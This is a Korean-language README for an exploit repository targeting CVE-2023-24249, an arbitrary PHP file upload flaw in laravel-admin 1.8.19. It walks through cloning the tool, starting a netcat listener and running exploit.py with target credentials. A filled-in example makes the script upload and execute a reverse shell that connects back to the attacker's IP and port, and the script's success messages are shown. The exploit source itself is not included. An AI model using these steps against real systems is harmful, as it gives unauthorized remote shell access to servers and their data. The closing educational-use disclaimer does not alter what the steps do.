
CVE-2023-24249에 대한 익스플로잇 스크립트 - 파일 업로드 및 명령어 주입을 통해 원격 코드 실행을 허용하는 취약점.
이 리포지토리는 laravel-admin 버전 1.8.19에서 발견된 심각한 취약점인 CVE-2023-24249에 대한 익스플로잇 스크립트를 포함하고 있습니다. 이 취약점은 임의의 파일 업로드를 허용하여 공격자가 조작된 PHP 파일을 통해 임의의 코드를 실행할 수 있게 합니다. 이 익스플로잇은 공격자가 대상 애플리케이션에 리버스 셸을 업로드하고 실행하여 원격 접근을 얻는 방법을 보여줍니다.
CVE-2023-24249는 laravel-admin v1.8.19의 임의 파일 업로드 취약점입니다. 이 취약점은 공격자가 임의의 PHP 파일을 업로드하고 실행하여 잠재적인 원격 코드 실행을 유발할 수 있습니다.
제공된 익스플로잇 스크립트는 CVE-2023-24249 익스플로잇 과정을 자동화합니다. 다음 단계를 수행합니다:
requests 라이브러리beautifulsoup4 라이브러리pip를 사용하여 필요한 라이브러리를 설치하세요:
pip install requests beautifulsoup4
리포지토리 클론:
git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
cd CVE-2023-24249-Exploit
시스템에서 리스너 시작:
nc -lvnp <PORT>
익스플로잇 스크립트 실행:
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
<TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP>, <YOUR_PORT>을 적절한 값으로 바꾸세요:
<TARGET_URL>: 대상 애플리케이션의 URL.<USERNAME>: 인증을 위한 사용자 이름.<PASSWORD>: 인증을 위한 비밀번호.<YOUR_IP>: 리버스 셸 연결을 수신할 귀하의 IP 주소.python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337
익스플로잇이 성공하면 스크립트는 다음과 같이 출력합니다:
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>
이 스크립트는 교육 목적으로만 제공됩니다. 명시적 허가 없이 이 스크립트를 시스템에 대해 무단으로 사용하는 것은 불법이며 비윤리적입니다. 저자는 이 스크립트로 인한 오용이나 피해에 대해 책임을 지지 않습니다.
<YOUR_PORT>: 리스너가 실행 중인 포트.